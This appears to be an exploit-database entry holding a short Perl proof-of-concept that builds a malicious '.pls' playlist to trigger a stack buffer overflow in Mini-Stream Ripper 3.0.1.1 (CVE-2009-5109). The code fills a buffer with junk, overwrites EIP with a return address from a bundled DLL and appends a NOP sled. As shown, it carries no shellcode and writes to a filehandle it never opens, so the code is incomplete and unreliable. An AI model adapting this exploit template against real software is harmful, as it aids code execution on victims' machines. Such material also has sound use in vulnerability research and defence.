Mini-stream Ripper - '.pls' Universal Buffer Overflow (Perl)

Related Vulnerabilities: CVE-2009-5109  
Publish Date: 29 Dec 2009
Author: jacky
                #Mini-Stream Ripper v3.0.1.1 Universal BOF !!!
#Discovered by ( mr_me) !!!
#Coded and Written by (Jacky)
#Greetz to Peter Van Eeckhoutte and all Corelanc0d3r team :D
#This time i exploited the program and i used as RET address a Universal one from MSRcodec00.dll
#And i haven't seen anyone using a universal address so i decided to do so ! ;-)
my $file="crash.pls";
print "Mini-Stream Ripper Universal BOF vulnerability\n";
print "Greetz to Peter Van Eeckhoutte and Corelanc0d3r Team\n";
my $junk="A"x26074;
my $eip=pack('V',0x0146b87b);  #>>>From MSRcodec001.dll (Universal address ;-) )
my $presc="SEXY";         # 4 Bytes to fill the pre-esp area !
my $esp="\x90"x25;

print HOLA $junk.$eip.$presc.$esp;
print "[+] Done!!!\n";
print "Written By Jacky\n";